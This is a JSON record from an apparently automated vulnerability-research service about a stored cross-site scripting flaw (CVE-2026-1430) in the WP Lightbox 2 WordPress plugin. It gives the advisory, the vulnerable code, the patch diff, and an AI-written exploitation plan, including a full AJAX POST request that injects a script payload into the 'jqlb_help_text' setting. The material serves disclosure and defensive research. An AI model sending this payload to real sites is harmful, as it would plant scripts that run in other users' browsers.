[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fWU6AlDkNk37lLVvecmF3M4uTQzkYjkLr7bwNEmEzWLE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-1430","wp-lightbox-2-authenticated-administrator-stored-cross-site-scripting","WP Lightbox 2 \u003C 3.0.7 - Authenticated (Administrator+) Stored Cross-Site Scripting","The WP Lightbox 2 plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to 3.0.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","wp-lightbox-2",null,"\u003C3.0.7","3.0.7","medium",4.4,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:H\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-30 00:00:00","2026-04-02 14:49:17",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6ce24fa7-b265-4689-94b3-7df62c7074c2?source=api-prod",4,[22,23,24,25,26,27,28,29],"I18n\u002Fhowtouse.html","I18n\u002Fwp-lightbox-2.pot","admin\u002Fadmin_menu.php","admin\u002Fgeneral_settings.php","admin\u002Fscripts\u002Fangular.min.js","admin\u002Fstyles\u002Fadmin_themplate.css","admin\u002Fstyles\u002Fjquery-ui.css","includes\u002Finstall_database.php","researched",false,3,"# Research Plan: Exploitation of CVE-2026-1430 (WP Lightbox 2 Stored XSS)\n\n## 1. Vulnerability Summary\nThe **WP Lightbox 2** plugin (versions \u003C 3.0.7) contains a stored cross-site scripting (XSS) vulnerability within its settings management. Specifically, the `save_parametrs` function in `admin\u002Fgeneral_settings.php` fails to sanitize or escape input before storing it in the WordPress database via `update_option`. Although the vulnerability is authenticated (Administrator+), it presents a significant risk in environments where `unfiltered_html` is disabled (e.g., WordPress Multi-site), allowing an administrator to bypass security restrictions and inject arbitrary scripts that execute when users view pages with the lightbox active.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action**: `save_in_databese_lightbox2`\n- **Vulnerable Parameter**: `jqlb_help_text` (and potentially other keys in the `get_general_settings` array)\n- **Authentication**: Required (Administrator privileges with `manage_options` capability)\n- **Preconditions**: The plugin must be active. Exploitation is most relevant when `unfiltered_html` is restricted.\n\n## 3. Code Flow\n1. **Entry Point**: The plugin registers an AJAX handler in `admin\u002Fgeneral_settings.php`:\n   ```php\n   add_action( 'wp_ajax_save_in_databese_lightbox2', array($this, 'save_parametrs') );\n   ```\n2. **Nonce Verification**: The `save_parametrs()` function verifies a nonce passed via `$_POST['wp_lightbox_2_general_settings_page']`.\n3. **Sink (Storage)**: The function iterates through `$initial_values` (retrieved from `$this->databese_settings`, which contains the `get_general_settings` array defined in `includes\u002Finstall_database.php`).\n   ```php\n   \u002F\u002F admin\u002Fgeneral_settings.php\n   foreach($initial_values as $key => $value){\n       if(isset($_POST[$key])){\n           update_option($key, stripslashes($_POST[$key])); \u002F\u002F VULNERABLE SINK: No sanitization\n       }\n   }\n   ```\n4. **Rendering (Frontend)**: The stored option (e.g., `jqlb_help_text`) is retrieved and echoed on pages where the lightbox enqueues its configuration or tooltips.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is generated on the plugin's general settings page.\n\n1. **Identify Page**: The settings page is located at `\u002Fwp-admin\u002Fadmin.php?page=WP-Lightbox-2`.\n2. **Access Page**: Navigate to this URL using the `browser_navigate` tool while logged in as an Administrator.\n3. **Extract Nonce**: The nonce is present in an input field named `wp_lightbox_2_general_settings_page`.\n   - Use `browser_eval`: `document.getElementsByName(\"wp_lightbox_2_general_settings_page\")[0].value`\n\n## 5. Exploitation Strategy\nThe exploit involves sending a crafted AJAX request to save a malicious payload into the `jqlb_help_text` setting.\n\n### Step 1: Collect Required Parameters\nThe `save_parametrs` function requires *all* settings keys to be present in the `$_POST` array to avoid an error. From `includes\u002Finstall_database.php`, the keys for `get_general_settings` are:\n- `jqlb_overlay_opacity`\n- `jqlb_help_text`\n- `jqlb_margin_size`\n- `jqlb_automate`\n- `jqlb_comments`\n- `jqlb_resize_on_demand`\n- `jqlb_show_download`\n- `jqlb_navbarOnTop`\n- `jqlb_resize_speed`\n\n### Step 2: Send Malicious POST Request\nUse the `http_request` tool to perform the update.\n\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n```text\naction=save_in_databese_lightbox2&\nwp_lightbox_2_general_settings_page=[EXTRACTED_NONCE]&\njqlb_help_text=\u003C\u002Ftextarea>\u003Cscript>alert(document.domain)\u003C\u002Fscript>&\njqlb_overlay_opacity=80&\njqlb_margin_size=0&\njqlb_automate=1&\njqlb_comments=1&\njqlb_resize_on_demand=0&\njqlb_show_download=0&\njqlb_navbarOnTop=0&\njqlb_resize_speed=400\n```\n*(Note: Use URL encoding for the payload).*\n\n## 6. Test Data Setup\n1. **User**: Ensure an Administrator user exists.\n2. **Plugin**: Activate `wp-lightbox-2`.\n3. **Page Content**: Create a public post containing an image link to ensure the lightbox logic triggers on the frontend.\n   ```bash\n   wp post create --post_type=post --post_status=publish --post_title=\"XSS Test\" --post_content='\u003Ca href=\"https:\u002F\u002Fexample.com\u002Ftest.jpg\" rel=\"lightbox\">View Image\u003C\u002Fa>'\n   ```\n\n## 7. Expected Results\n- The AJAX request should return `sax_normala` (the success string defined in `admin\u002Fgeneral_settings.php`).\n- When navigating back to the settings page or viewing a post where the lightbox is active, the script `\u003Cscript>alert(document.domain)\u003C\u002Fscript>` should execute.\n\n## 8. Verification Steps\n1. **Check Database**: Use WP-CLI to confirm the option is stored unsanitized.\n   ```bash\n   wp option get jqlb_help_text\n   ```\n2. **Check Response**: Inspect the HTML of the settings page to see if the payload breaks out of the `\u003Ctextarea>`:\n   ```bash\n   curl -s -b cookies.txt \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=WP-Lightbox-2\" | grep \"jqlb_help_text\"\n   ```\n\n## 9. Alternative Approaches\nIf `jqlb_help_text` is not reflected on the frontend, target other settings from `get_design_settings` if accessible, or check if the plugin supports a shortcode that displays the \"Help Text\". Alternatively, since the vulnerability exists in the `update_option` call, any setting updated by the AJAX action is a candidate if it is echoed elsewhere without escaping.","The WP Lightbox 2 plugin for WordPress is vulnerable to Authenticated Stored Cross-Site Scripting (XSS) due to a lack of input sanitization in its AJAX settings update handler. This allows administrators to inject malicious JavaScript into settings such as 'jqlb_help_text', which executes when users interact with the plugin's features. This vulnerability is particularly impactful in multi-site installations where 'unfiltered_html' is restricted.","\u002F\u002F admin\u002Fgeneral_settings.php lines 32-42\npublic function save_parametrs(){\n\t $initial_values= $this->databese_settings;\n$kk=1;\n\tif(isset($_POST['wp_lightbox_2_general_settings_page']) && wp_verify_nonce( $_POST['wp_lightbox_2_general_settings_page'],'wp_lightbox_2_general_settings_page')){\n\n\t\tforeach($initial_values as $key => $value){\n\t\t\tif(isset($_POST[$key])){\n\t\t\t\tupdate_option($key,stripslashes($_POST[$key]));\n\t\t\t}\n\t\t\telse{\n\t\t\t\t$kk=0;\n\t\t\t\tprintf('error saving %s \u003Cbr>',$key);\n\t\t\t}\n\t\t}\n\t}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-lightbox-2\u002F3.0.6.8\u002Fadmin\u002Fgeneral_settings.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-lightbox-2\u002F3.0.7\u002Fadmin\u002Fgeneral_settings.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-lightbox-2\u002F3.0.6.8\u002Fadmin\u002Fgeneral_settings.php\t2025-06-04 19:15:00.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-lightbox-2\u002F3.0.7\u002Fadmin\u002Fgeneral_settings.php\t2026-01-31 17:51:00.000000000 +0000\n@@ -32,12 +32,19 @@\n \tpublic function save_parametrs() {\n \t\t$initial_values = $this->databese_settings;\n \t\t$kk = 1;\n \n+\t\tif ( ! current_user_can( 'manage_options' ) || ! wp_doing_ajax() ) {\n+\t\t\tdie('Authorization Problem');\n+\t\t}\n+\n \t\tif ( isset( $_POST['wp_lightbox_2_general_settings_page'] ) && wp_verify_nonce( $_POST['wp_lightbox_2_general_settings_page'], 'wp_lightbox_2_general_settings_page' ) ) {\n \n \t\t\tforeach ( $initial_values as $key => $value ) {\n \t\t\t\tif ( isset( $_POST[ $key ] ) ) {\n-\t\t\t\t\tupdate_option( $key, stripslashes( $_POST[ $key ] ) );\n+\t\t\t\t\tupdate_option( $key, sanitize_text_field( stripslashes( $_POST[ $key ] ) ) );\n \t\t\t\t} else {\n \t\t\t\t\t$kk = 0;\n \n \t\t\t\t\tprintf( 'error saving %s \u003Cbr>', $key );\n@@ -45,7 +52,7 @@\n \t\t\t\t}\n \t\t\t}\n \t\t} else {\n-\t\t\tdie('Authorization Problem ');\n+\t\t\tdie('Authorization Problem');\n \t\t}","The exploit targets the AJAX action 'save_in_databese_lightbox2' used by the plugin to save general settings. An attacker with Administrator privileges first navigates to the plugin's settings page (\u002Fwp-admin\u002Fadmin.php?page=WP-Lightbox-2) to extract a valid CSRF nonce from the 'wp_lightbox_2_general_settings_page' hidden input field. The attacker then sends a POST request to '\u002Fwp-admin\u002Fadmin-ajax.php' with the action parameter, the nonce, and a malicious payload containing arbitrary HTML\u002FJavaScript inside the 'jqlb_help_text' parameter. Because the plugin uses 'update_option' on the raw POST data (after stripslashes) without sanitization, the payload is saved to the database. The script will execute when the settings page is reloaded or when the lightbox help text is rendered on the website's frontend.","gemini-3-flash-preview","2026-04-17 22:22:33","2026-04-17 22:23:05",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.0.6.8","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-lightbox-2\u002Ftags\u002F3.0.6.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-lightbox-2.3.0.6.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-lightbox-2\u002Ftags\u002F3.0.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-lightbox-2.3.0.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-lightbox-2\u002Ftags"]